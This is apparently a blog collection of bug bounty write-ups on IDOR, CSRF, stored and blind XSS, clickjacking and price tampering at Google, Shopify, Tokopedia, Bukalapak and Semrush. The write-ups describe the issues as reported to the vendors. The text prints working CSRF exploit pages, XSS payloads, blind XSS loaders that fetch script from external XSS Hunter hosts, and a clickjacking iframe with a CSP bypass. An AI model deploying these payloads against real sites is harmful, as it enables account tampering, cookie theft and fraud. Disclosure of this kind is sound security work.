2 CSRF 1 IDOR on Google Marketing Platform

Found IDOR and CSRF Vulnerability on Google!

In this article, I would like to share when I found a bug on Google Products. I hope you can get some useful information on this writeup, let me know your feedback on this writeup on a comment section or on my twitter: Apapedulimu!

Once Upon a Time

So, I’m on break to bug hunting since November 2019 because a lot of things and of course lack of energy because facing many duplicates. In February I decide to bug hunting on my favorite please: Google. Although I’m not pro enough to hunt at Google, at least Google has many assets to look at it. So, it’ll fun when hunting on them. And then I ping up my friends and invite him to hunt together on Google, and he says YES! It’s always fun when to hunt together with your friends because we can share what we dig and the information we gain and have a quick chat. So, when we can’t find any bug at least we can have fun~

After that, I can’t find anything and run out of coffee. I decide to sleep and leave my friends to do the research. In the morning, he pings me up because looks like he found some interesting endpoint on marketingplatform.google.com. But, after taking a look it’s just working as intended.

Aim The Target

After that, I decided to take a look deeper into the subdomain(marketingplatform.google.com). And there’s some register page to become Google Partner. Idk the detail, In short, we can post our company on that site. I take a look at the feature on the website and try to understand the flow, register as usual (with including XSS payload of course) with some hope it’ll be pop up on some page. Take a look the payload XSS has just become Text! 🙁

Okay, XSS isn’t working on there, let’s move to take a look another basic vulnerability, try the IDOR or Broken Access Control, let’s change the ID! But wait, it’s a lot ID to change, I exactly don’t know what ID to change :(. Let just request another request on other accounts and see the different ID on both requests!

Get Some Clue!

After some take a look at both request deeper, I realize if there’s some different ID and 4 in total, and the ID is exactly on the referer. I assume the ID is reflected from the ID on the public URL. But there’s some ID it’s totally different, it’s taken me time to think where the ID comes from, and then I decided to just delete it and see what happened when I send the request after changing the ID!

IDOR on Edit Profile!

After the deleted the ID where I don’t know the ID come from, I send the request and just return [1] on the response. Hmmm, Okay! Let’s reload the victim profile. When I reload the victim profile, it’s just changed to data I send it before! It means IDOR right! After double-check it, I can confirm it’s and IDOR. So, this is the POC for this :

IDOR Step To Reproduce :

  1. Go to https://marketingplatform.google.com/about/partners/create-listing, register as a partner and go to “edit listing”
  2. Intercept the request via burp
  3. Change the ID on burp with another user ID
  4. Make sure the third user ID is applying on the right parameter, and delete the last parameter ID in the end.
Vulnerable IDOR Request
Vulnerable IDOR Request

Video: 

After I confirm the IDOR I quickly make a report and send it to Google VRP!

CSRF on Edit Profile!

IDOR report has been sent, and then I am trying to relax and keep in my mind if the IDOR might be duplicate. So, never celebrate too early. After some relax and enjoy my Kapal Api Coffee. I try to take a look at my burp history, do something interesting happened when I’m not aware of it?

After some take a look at my burp history, I realize if the Edit Profile Request doesn’t contain any CSRF token, it’s mean the endpoint is also vulnerable with CSRF Attack? Since the required ID is can be accessed publicly, the attacker can be gain the ID of the victim and send malicious links who contain CSRF Attack to the victim!

I quickly try to reproduce the CSRF Attack to confirm the endpoint is vulnerable with CSRF Attack, I use this script :

<title>CSRF on Marketing Platform Google</title>

//parameter ID : https://marketingplatform.google.com/about/partners/company/5148764629106688/gacp/5139310734999552/service/5199468395757568

<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://marketingplatform.google.com/about/partners/services/listing/save", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xhr.send('[[["first-parameter",[null,"hacked by hacker ","merauke","1231231",null,"AS","-8.4991117,140.4049814","[email protected]","0831231911"],null,[null,null,"victim","https://hacker.com",null,null,"hacked by hackerr ",null,null,null,null,null,null,null,null,null,null,null,null,null,""],null,null,[null,"hacked by hackerr ","hacked by hackerr","[email protected]","08318273191"],null,null,[]],[null,null,null,[null,null,"Full-Service Digital",null,null,[],["Large Business"],null,null,"",null,[],null,[],null,null,"third-parameter"],[],[],[],[],null,null,null,[],[],"second-parameter",[[null,"hacked by hackerr","hacked by hackerr","123151",null,"DZ","-8.4991117,140.4049814","[email protected]","08310293801",true,null,null,null]]]]]');
}
</script><center>
<h1>CSRF To Edit Profile</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

I successfully perform the CSRF Attack on that endpoint with this Step To Reproduce:

Steps to reproduce:

  1. Save the ID and edit the parameter with the parameter of victim company and save .html
  2. Click the exploit.
  3. The Profile will be changed

Yes! I Confirm if the CSRF Attack is possible and quickly report them to Google VRP.

But wait, since I reported the IDOR issue first The VRP Team believes if the IDOR fix might also fix the CSRF vulnerability. So, to get the “Nice Catch” email, I must wait for the IDOR issue fixed first, and then if the CSRF still exists, I will get the “Nice Catch” Email! Fair enough.

And Another CSRF on Register Page!

After found CSRF on edit profile I started to focus to find another CSRF, I double-checks burp history to find request without any CSRF Token / CSRF Protection. And then I found the CSRF at the beginning I hunt on that subdomain. The Register page! I try to make simple script to reproduce CSRF. The script is like this :

<title>CSRF on Marketing Platform Google</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://marketingplatform.google.com/about/partners/services/become_gacp/create_company", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xhr.send('["","Hacked By Hacker!!!!!!!!","400","ID"]');
}
</script><center>
<h1>CSRF To Overwrite Current Register Data</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

Sure, the endpoint is vulnerable with CSRF Attack. But, what is the impact? And it’s just register page, right? After some take a look on the subdomain, I realize if user can register a new company while he has done the register and the latest data can be overwrite by a new data. So, the attacker can trick the victim when victim register his company and under review by the Google Team, attacker can launch the CSRF Attack at his company and the data who not yet review will overwrite with a new data.

Okay! So, this is the Step To Reproduce :

  1. Register your account to partner on https://marketingplatform.google.com/about/partners/create-listing and go to your profile ( click view draft )
  2. Go to https://labs.apapedulimu.click/exploit/google/csrf-register-marketingplatform.html ( I’ve made the script to perform CSRF )
  3. Refresh your profile, your profile name will change to “Hacked By Hacker!!!! “

After that, I quickly sent the report to Google VRP!

Timeline :

  • Feb 7, 2020 – Reported IDOR
  • Feb 8, 2020 – Reported CSRF (Register Page)
  • Feb 15, 2020 – Nice Catch! IDOR
  • Feb 15, 2020 – Nice Catch! CSRF
  • Feb 16, 2020 – Reported Another CSRF ( Edit Profile )
  • Feb 21, 2020 – Make a deal on CSRF ( Wait until IDOR Fixed )  to get “Nice Catch”
  • Mar 4, 2020 – Awarded 3,133.70 ( IDOR )
  • Mar 4, 2020 – Awarded 500 ( CSRF on Register PAge )
  • Mar 14, 2020 – Fixed ( CSRF on Register Page & IDOR on Edit Profile )
  • Mar 14, 2020 – Follow Up The CSRF on Edit Profile ( Still vulnerable )
  • Mar 31, 2020 – Nice Catch!
  • Apr 14, 2020 – Awarded 500 (CSRF on Edit Profile)
  • May 2, 2021 – Marked as Won’t Fix (CSRF on Edit Profile)

[Google VRP] How I Get Blind XSS At Google With Dork (First Bounty and HOF )

I’m rioncool22, based on North Sumatera, Indonesia

Entering the Google Hall of Fame is one of my dreams. A lot of my time was spent looking for vulnerabilities on Google, but it didn’t work out. Until one day I received a notification from XSSHunter that my payload was executed on the googleplex.com subdomain :D.

To look for this vulnerability, I used Google Dorking to make the search easier.

Dork : site:support.google.com inurl:/contact/ 

If you searching with this dork, You will find lots of contact forms.

After some searching, i found this link https://support.google.com/cloud/contact/prod_issue 😀

Fill XSSHunter Payload in the name and get executed in Google Admin Panel

Step To Reproduce : 
1. Open this link https://support.google.com/cloud/contact/prod_issue
2. Fill Subject, Full Description, and Affected product with XSS hunter Payload
3. XSS will be executed in googleplex.com subdomain 😀

Tips : You can upgrade the dork with another word, like “fill out this form” to find more contact forms 😀

Timeline :

  • 26 Feb 2020 : Submit Report To Google VRP
  • 27 Feb 2020 : First Respond From Google VRP
  • 28 Feb 2020 : Nice catch!!!
  • 25 Mar 2020 : Bounty Awarded $3133.70
  • 11 Mar 2021 : Public Disclosure

Get in touch with me on :

 

 

(Shopify.com) Blind Stored XSS Via Staff Name $$$$

First, I want to thank apapedulimu for allowing me to make my first write up on this blog

I’m rioncool22, based on North Sumatera, Indonesia

I want to share to you about my finding in shopify.com (Hackerone Program). I very often do bug searches on the shopify site and submit reports but it always ends with Informative and N/A. But, one day i read a report from the Hactivity about blind XSS. The payload get executed at unexpected place. After that, I tried it on shopify and the payload got fired in admin panel 😀

Screenshot-348

Step to reproduce :

  1. Go to https://your-store.myshopify.com/admin/settings/account
  2. Add Staff Account
  3. Fill First & Last Name with this payload “><script>$.getScript(“//xsshunterdomain”)</script>
  4. XSS fired in Admin Panel

Some tips : If you search XSS Bug, Change your payload with XSS Hunter payload, because you will not know where the payload get fired 😀

Timeline : 

  • Aug 1 : Submit Report to Shopify
  • Aug 4 : First respone from Shopify
  • Aug 5 : Triaged
  • Aug 6 : Resolved & Rewarded $$$$
  • Aug 19 : Public Disclosure

Get in touch with me on :

Price Parameter Tampering On Bukalapak

On the Thursday night, I feel boring on my rooms and then I try to do something to make my time is more valuable. After that I’m thinking of “How about I testing Bukalapak” . Not on the website application, But on their Mobile Application, although I’m not expert at all and just testing on their traffic from the Mobile Application to server.

I start hunt bug just trying to figured what’s the feature I should test, with the feeling of course. Long story short, I take a look on the feature called “Buka Pengiriman” In this feature, seller can pay the shipping fee on bukalapak and the shipping expedition will come to seller place to pick up the goods without request payment.

After now know the system work, I start thinking do this can be vulnerable on Parameter Tampering, Because I read a lot of the Parameter Tampering but have no luck to found one of them.

And then I start to launch the parameter tampering attack on the endpoint https://api.bukalapak.com/open-shipments/transactions , because I take a look on the system, this endpoint include the Price and the endpoint exist before system redirect to payment page.

Vulnerable Endpoint Price Parameter Tampering
Vulnerable Endpoint Price Parameter Tampering

And then when I trice to change the value of shipping and total parameter to 10, the response is also turning to 10. Hmmm, do this is really Vulnerable to Price Parameter Tampering ?

Is this parameter tampering ?
Is this parameter tampering ?

Because I’m not sure, I take a look on the my payment page to see there’s a some invoice with the following price?

Price on Payment page
Price on Payment page

Okay, this is on the payment page. But, I still not sure if this can be valid. So, I try to pay the invoice and the status is return to SUCCESS. And I was like :

Asiap GIF from Asiap GIFs

And then after that,  I start make some report to Bukalapak.

After long day no response, I ping up again to ask about the bounty, and they said it’s eligible for bounty and proceed the bounty soon. Long story short, the bounty of the Price parameter tampering on the Bukalapak is : 2.000.000 IDR or around 150$ ( Not include the tax).

Timeline :

  • Reported – Mar 7, 2019
  • Validated Valid – Mar 12, 2019
  • Rewarded – May 13, 2019
  • Fixed – July 24, 2019

Multiple Stored XSS On Tokopedia

So, It’s just old bug who I have been reported around 2018. I’ll share what I found on Tokopedia. Just in case you need some article to go to sleep. But it’ll just short description and PoC Here it is :

Stored XSS On Complain Product (Keterangan Bukti Field)

This vulnerable perform on feature complain product, When buyer not satisfied with the stuff who has been buy by buyer. Buyer can complain with upload some Image. And the vulnerability is on Description image field.

PoC :

  1. Go to complain menu
  2. Upload some image
  3. Input Payload on description of image ( <img src=x onerror=alert(document.domain)> )
  4. Payload will be execute when user navigate to the resolution menu.

Video :

Stored XSS On Location Shop (m.tokopedia.com )

This vulnerable on Location Shop Parameter at https://m.tokopedia.com/ . So, this bug is just set the location shop to payload. And when someone navigate to the Shop detail. It’ll pop up the XSS.

PoC :

  1. Open The mobile apps Tokopedia
  2. Edit the location of shop to XSS payload ( <img src=x onerror=alert(document.domain)> )
  3. Open the location via browser

Video :

Stored XSS via AngularJS Injection On Etalase Name

Vulnerability exist because Tokopedia install the AngularJs old version and not filtering the illegal character very well. So, I just Insert the payload of AngularJs Injection to Etalasane Name and XSS will be fired up.

PoC :

  1. Go To Add product
  2. Set the Etalase Name to AngularJs Payload ( {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(document.domain)//’);}} )
  3. Save, And Open the product

Video :

Blind XSS on CS System ( Tokocash )

Tokopedia have some CS system, use the salesforce application. And when having some discussion between Tokopedia & Salesforce, the root cause is on the Tokopedia Custom Code.

PoC :

  1. Login Tokocash.com
  2. REquest new ticket with payload of XSS Hunter
  3. Wait for execute payload on XSSHunter Dashboard.

Actually I have found more Stored XSS, but sadly that’s mark as Duplicate. I just fresh Bug who has been marked as valid only.

Thanks! Get in touch with me on Twitter : Apapedulimu

Clickjacking on Google MyAccount Worth 7,500$

Recently, I got surprised from google, I found bug Clickjacking On Google My account. And they reward me 7,500$ for single bug. Amazing, right?. This bug I’ve found on March 2018, but the clickjacking is just blocked by CSP, and on August, I’ve found way to bypass it.

Actually, I’ve been research on business.google.com subdomain and look around, just dummies touching the feature. See the respond and request. Try a stupid thing, edit the parameter, etc. And when I want to manage the user is redirect me to myaccount.google.com which is place where I found the bug.

I look at my Lovely Community Edition of Burp Suite, There’s no header X-Frame-Option on it. At that time, I use Firefox ESR, I craft simple html just to iframe the page. And success, report them, but not applicable. Because on Firefox Quantum, Say Blocked By CSP,

Clickjacking Blocked By CSP
Clickjacking Blocked By CSP on Modern Browser

Sad to hear that, but I realize I just too noob. So, It’s okay. I leave my research on google until August 15th. I try to look around again on my previous research. With more focus and of course my black coffee. I try to understand the code work.

I realize if the CSP rule is reflected from my request parameter.  I found it on business.google.com , so the parameter of the host is business.google.com. 

URL :  https://myaccount.google.com/u/0/brandaccounts/group/101656179839819660704/managers?originProduct=AC&origin=https://business.google.com

And the respond is :

Response And Request Header

I realize if host just accept from business.google.com on origin parameter. So, I think the only way to execute it just from business.google.com . But, I try to edit parameter the origin to https://akugalau.business.google.com. It’s accepted! But, It’s impossible to use that subdomain. Hmmmm,

Okay, The csp still here, And I can’t do nothing, right? Do, I must give up? Come on, It’s a big company and I ? Just little kid with the broken heart story 🙁 SAD!

But, I have a lot free time to do stupid thing, right? So, I just adding illegal character on the origin parameter. I try to put URL Encode before the business.google.com. Become like this :

https://myaccount.google.com/u/0/brandaccounts/group/101656179839819660704/managers?originProduct=AC&origin=https://%0d.business.google.com

And the CSP is disappear, w000tttttt!!!!?!@?#!@?3!@?3?

The CSP is disappear

I try to iframe that And, I success to perform the clickjacking :’ . My condition is between not believe this and happy. 

If you ask me where the logic from adding the url encode on that. I dont understand :’ , I just lucky kid.

I make report quickly and submit to google. After 1 month, I just expected it’s worth 3,133.7 or 5,000. But, the google give me bigger bounty, they give me 7,500$ . What !

I dont know what i suppose to say. :’ , I dont believe it because I just noob kid.

PoC Code : 

<iframe src=”https://myaccount.google.com/u/0/brandaccounts/group/{your-group-id}/managers?originProduct=AC&origin=https://%0d.business.google.com” width=”1000″ height=”1000″>

Attack Scenario : 

1. Admin invite new user on group-id
2. New user will accept the invitation
3. New user know the {your-group-id} 
4. New user create a malicious page including this clickjacking to trick admin make the new user account to the owner
5. The group is takeover by the user.

Video :

Timeline : 

  • Aug 11 : Report to Google
  • Aug 15 : Google Staff Ask Detail
  • Aug 15 : Adding Detail
  • Aug 21 : Google Can’t Prove Bug
  • Aug 21 : Give them Video to PoC
  • Aug 28 : Google Ask About Attack Scenario
  • Aug 28 : Give the Attack Scenario
  • Sep 11 : Nice Catch!
  • Sep 25 : Bounty 7,500$
  • Sep 25 : I Cry.

And also, Big thanks to all Indonesia Bug Hunter Community, Who has been teach me a lot about Bug Bounty and the ethical of bug hunter.

Get in touch with me on twitter : LocalHost31337

Exploiting XSS in POST requests on semrush.com

Recently, I’ve found something new for me , and I found this on www.semrush.com some bug bounty program on hackerone  . And it’s first time I’ve found XSS on hackerone program. So, This is the story.

While I’am looking around on semrush.com , try to one page and another page, put some payload on all field, and end on page https://www.semrush.com/my-posts/  this page is can be post something, and you able write everything you want. I try to put some xss payload on the field , but nothing happen.

Then, I try to upload some image, And the interesting time begin. I try to upload malicious filename on that page. It’s looks like this.

I take a long time to analyzing the request and response when I upload some image, but after a cup of coffee, help me to focus, and I notice the parameter CKEditorFuncNum on request is reflected on response. I try to write some text and see the result, is reflect on response

After know is reflected , I use payload XSS to trigger the XSS with payload like this : </script><script>alert(document.domain)</script> and it’s execute as script!.

After know this, I made simple HTML to execute this, and the code is like this :

<html>
  <body>
    <form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

And whenever user click Submit Request, The XSS will be fired UP!

This is mark as valid from semrush security team. It’s has been fixed very well. More Experience I Get.

You can visit on hackerone report : https://hackerone.com/reports/375352

How I Accidentally Found Stored XSS On Tokopedia

So, recently I’ve found Stored XSS On Tokopedia. But, I Accidentally Found Them while buy something on tokopedia. And there is it. :

Summary

After found Stored XSS in previous post, and rewarded by Tokopedia, I start looking some Smartphone on tokopedia. And while checkout as usual, then I Have an idea to fill all field with Payload XSS , And then I use XSS Hunter to fill all the field with payload XSS from XSS Hunter. After check out and pay the fee, I start looking XSS Hunter, But no response there. So, I start looking my transaction and see the Invoice. And I got this :

I found my payload in invoice without filtering.

And I look at the invoice and found colomn Catatan Untuk Penjual & Dropshipper  with value of my XSS Payload from xss hunter, But one of them is filtering my Payload. At this Time I Assume If my payload XSS is work on Catatan Untuk Penjual Field, and I must to do is When seller verify my order and send my package. But I Wrong. 

After few days, I notice  if my order has been shipped by seller, and I got the tracking code. After receive notice like this, I start looking my XSS Hunter dashboard. I suprised, because I got response from tokopedia on seller side, So I Assume if my XSS execute on seller side and on Catatan Untuk Penjual parameter.

Got response from seller side on dashboard XSS hunter.

After that, I quickly make report and send it to Tokopedia. With detail if XSS vuln on Catatan Untuk Penjual parameter. In the next day, Tokopedia told me if the report hard to understand , and Ask me to do general alert like previous report. And I starting to try to reproduce it with my own shop, So I can pop up the alert without annoying another person. But, I got confused because no pop up found when I try to reproduce with my recent experience. After re-thinking again, What the problem, my smartphone has arrived, the courier send me the package, and I started to looking the detail from my package And I got suprised because my XSS is pop up on there.

My Payload is execute on there.

Actually, the vuln XSS is not on Catatan Penjual, but on Dropshipper parameter. Iam to dumb because not see the DOM on XSS Hunter, The DOM can help you to see where your XSS is popup their self. After that I started to report again to Tokopedia IT Security Team.

Step To Reproduce :

  1. Buy something
  2. While checkout fill the Dropshipper field with XSS Payload.
  3. Wait the seller to confirm.
  4. XSS will be fired up.
XSS Fired up when seller confirm the order.

Timeline : 

  • Mar 7 : First Report Send
  • Mar 7 : Tokopedia Tim Asked More Information
  • Mar 7 : Detail Report Send
  • Mar 9 : Tokopedia Confirmed the vuln and mark bug as “Medium” Severity
  • Mar 27 : Tokopedia Fix the bug and ask Re-Testing.
  • Mar 27 : I Confirm If bug is fixed from my side.
  • May 2 : Rewarded

Thanks for reading, Happy Hacking!

 

Blind XSS in Admin Panel on Name Parameter

Description :

Blind XSS is fired up on admin panel on name parameter, While the register there’s a field Full Name, I fill it with XSS Payload, I use XSSHunter to execute this. In a Next day I’ve found my XSS result on XSShunter dashboard through their admin Panel, I able to showing admin IP / Cookies / Path of admin, and etc. Maybe the admin will activate / reviewing the user registration.

PoC :

1. Register new account and fill the Field Full name with Payload From XSSHunter. ( “><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait on the Next Day.

Impact :

Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.

How Do you Know it’s Blind XSS on admin page?

Actually, Im not sure at the first time I found, After registering my account, I get the email from website to confirm my account, And my name going to ">  in my recent test, I use that payload just showing "> and XSS payload will execute,

Verify my email address from website.

I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.

Note : The team request limited disclosure.

I contacted the team via their contact page. And got positive report from them, After seeing my report they fix the vuln and will send me some SWAG. Yay!

Thanks.

Chaining CSRF With Self-Stored XSS On Tokopedia

Summary :

At the first time, I found Self-Stored XSS on Tokopedia in their template message, In Tokopedia have feature template message to chat seller with common question like “This Goods Is Ready, What Is The Variant color, and etc”. User can set the template message by their self, and I try to insert the payload XSS on the template message , and when I open the message, the XSS will be pop up, And I assume this is Self-Stored XSS. And after that I think if Self-Stored XSS not high enough because the user must be input the payload to their template. And I try to dig the Request And I found some JSON request without Token on their endpoint, and the content-type not checked by their system and I think it will be Valid CSRF. So, I try to chain that bug in one action.

Step to reproduce :

  • Create .html code like this :
<title>CSRF To XSS on tokopedia</title>
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST",
"https://chat.tokopedia.com/tc/v1/update_chat_templates", true);
xhr.withCredentials="true";

xhr.setRequestHeader("Content-type", "application/x-www-form-
urlencoded");

xhr.send('{"is_enable":true,"templates":["Bisa dikirim hari ini
ga?","Terima kasih!","<script>alert(document.domain);//"]}');
}
</script><center>
<h1>CSRF To XSS On tokopedia</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>

The code will be send request to https://chat.tokopedia.com/tc/v1/update_chat_templates endpoint to add template message [“Bisa dikirim hari ini ga?”,”Terima kasih!”,”<script>alert(document.domain);//”] . Who included by Payload XSS.

So, when victim visit that link,  will be added payload XSS to their template message, and when victim try to chat with some seller, the XSS will be execute.

Video :

Timeline :

  • Sun, Feb 25, 2018 at 2:31 PM : Report Send
  • Sun, Feb 25, 2018 at 3:34 PM : Tokopedia Team answer will investigate
  • Mon, Feb 26, 2018 at 10:11 AM : Tokopedia Team Mark as Duplicate the XSS ( Found By Internal Team ) and CSRF mark as LOW Severity
  • Tue, Feb 27, 2018 at 9:09 AM : Try to explain the CSRF to get Medium Severity >.<
  • Tue, Feb 27, 2018 at 10:52 AM : Tokopedia Team Mark XSS & CSRF Valid with Medium Severity because the endpoint is different with internal team report
  • Thu, Mar 1, 2018 at 9:57 PM : Tokopedia Fixed The XSS , and tell CSRF not be fixed because the endpoint will changed soon.
  • Wed, Mar 21, 2018 : Rewarded! Yay!

Thanks.

Original Report [ID] : https://drive.google.com/file/d/0B3hUlq3mDkikVXRWdEdBalpmZVlncFFqU3JXSFpFTkFnSGkw/view